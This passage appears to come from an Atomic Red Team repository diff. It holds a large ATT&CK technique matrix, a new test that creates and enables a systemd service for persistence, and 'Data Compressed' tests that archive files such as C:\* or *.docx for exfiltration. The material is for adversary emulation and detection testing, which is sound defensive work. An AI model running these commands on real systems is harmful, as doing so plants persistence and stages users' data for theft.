| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Software Deployment Tools](../../T1072/T1072.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Windows Management Instrumentation](../../T1047/T1047.md) | [Domain Account](../../T1136.002/T1136.002.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Time Discovery](../../T1124/T1124.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [External Remote Services](../../T1133/T1133.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Local Accounts](../../T1078.003/T1078.003.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Office Application Startup](../../T1137/T1137.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hide Artifacts](../../T1564/T1564.md) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Office Test](../../T1137.002/T1137.002.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Port Monitors](../../T1547.010/T1547.010.md) | Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Password Filter DLL](../../T1556.002/T1556.002.md) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | [Windows Service](../../T1543.003/T1543.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
| | | | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | | | [Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rundll32](../../T1218.011/T1218.011.md) | | | | | | | |
| | | | | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | | | | | | | |
| | | | | [Signed Binary Proxy Execution](../../T1218/T1218.md) | | | | | | | |
| | | | | [Signed Script Proxy Execution](../../T1216/T1216.md) | | | | | | | |
| | | | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
| | | | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Template Injection](../../T1221/T1221.md) | | | | | | | |
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
atomics/Indexes/index.yaml
-69051
View File
File diff suppressed because it is too large Load Diff
atomics/RC13378/RC13378.yaml
+73
View File
@@ -0,0 +1,73 @@
---
attack_technique: RC13378
display_name: Systemd Service Creation
atomic_tests:
- name: Create Systemd Service
description: |
This test creates a Systemd service unit file and enables it as a service.
supported_platforms:
- linux
input_arguments:
execstart_action:
description: ExecStart action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstart-marker
execstartpre_action:
description: ExecStartPre action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstartpre-marker
execstartpost_action:
description: ExecStartPost action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstartpost-marker
execreload_action:
description: ExecReload action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execreload-marker
execstop_action:
description: ExecStop action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstop-marker
execstoppost_action:
description: ExecStopPost action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstoppost-marker
executor:
name: bash
command: |
echo "[Unit]" > /etc/systemd/system/art-systemd-service.service
echo "Description=Atomic Red Team Systemd Service" >> /etc/systemd/system/art-systemd-service.service
echo "" >> /etc/systemd/system/art-systemd-service.service
echo "[Service]" >> /etc/systemd/system/art-systemd-service.service
echo "Type=simple"
echo "ExecStart=#{execstart_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStartPre=#{execstartpre_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStartPost=#{execstartpost_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecReload=#{execreload_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStop=#{execstop_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStopPost=#{execstoppost_action}" >> /etc/systemd/system/art-systemd-service.service
echo "" >> /etc/systemd/system/art-systemd-service.service
echo "[Install]" >> /etc/systemd/system/art-systemd-service.service
echo "WantedBy=default.target" >> /etc/systemd/system/art-systemd-service.service
systemctl daemon-reload
systemctl enable art-systemd-service.service
systemctl start art-systemd-service.service
- name: Cleanup Systemd Test
description: |
This cleans up the remnants of the SystemD service unit file creation test.
supported_platforms:
- linux
executor:
name: bash
command: |
systemctl stop art-systemd-service.service
systemctl disable art-systemd-service.service
rm -rf /etc/systemd/system/art-systemd-service.service
systemctl daemon-reload
atomics/T1002/T1002.md
+111
View File
@@ -0,0 +1,111 @@
# T1002 - Data Compressed
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002)
<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Compress Data for Exfiltration With PowerShell](#atomic-test-1---compress-data-for-exfiltration-with-powershell)
- [Atomic Test #2 - Compress Data for Exfiltration With Rar](#atomic-test-2---compress-data-for-exfiltration-with-rar)
- [Atomic Test #3 - Data Compressed - nix - zip](#atomic-test-3---data-compressed---nix---zip)
- [Atomic Test #4 - Data Compressed - nix - gzip Single File](#atomic-test-4---data-compressed---nix---gzip-single-file)
- [Atomic Test #5 - Data Compressed - nix - tar Folder or File](#atomic-test-5---data-compressed---nix---tar-folder-or-file)
<br/>
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | C:\*|
| output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip|
#### Run it with `powershell`!
```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
<br/>
<br/>
## Atomic Test #2 - Compress Data for Exfiltration With Rar
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | *.docx|
| output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar|
#### Run it with `command_prompt`!
```
rar a -r #{output_file} #{input_file}
```
<br/>
<br/>
## Atomic Test #3 - Data Compressed - nix - zip
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*|
| output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip|
#### Run it with `sh`!
```
zip #{output_file} #{input_files}
```
<br/>
<br/>
## Atomic Test #4 - Data Compressed - nix - gzip Single File
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt|
#### Run it with `sh`!
```
gzip -f #{input_file}
```
<br/>
<br/>
## Atomic Test #5 - Data Compressed - nix - tar Folder or File
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file_folder | Path that should be compressed | Path | /tmp/victim-files/|
| output_file | File that should be output | Path | /tmp/victim-files.tar.gz|
#### Run it with `sh`!
```
tar -cvzf #{output_file} #{input_file_folder}
```
<br/>
atomics/T1002/T1002.yaml
+98
View File
@@ -0,0 +1,98 @@
---
attack_technique: T1002
display_name: Data Compressed
atomic_tests:
- name: Compress Data for Exfiltration With PowerShell
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
supported_platforms:
- windows
input_arguments:
input_file:
description: Path that should be compressed into our output file
type: Path
default: C:\*
output_file:
description: Path where resulting compressed data should be placed
type: Path
default: C:\test\Data.zip
executor:
name: powershell
command: |
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
- name: Compress Data for Exfiltration With Rar
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
supported_platforms:
- windows
input_arguments:
input_file:
description: Path that should be compressed into our output file
type: Path
default: "*.docx"
output_file:
description: Path where resulting compressed data should be placed
type: Path
default: exfilthis.rar
executor:
name: command_prompt
command: |
rar a -r #{output_file} #{input_file}
- name: Data Compressed - nix - zip
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_files:
description: Path that should be compressed into our output file, may include wildcards
type: Path
default: /tmp/victim-files/*
output_file:
description: Path that should be output as a zip archive
type: Path
default: /tmp/victim-files.zip
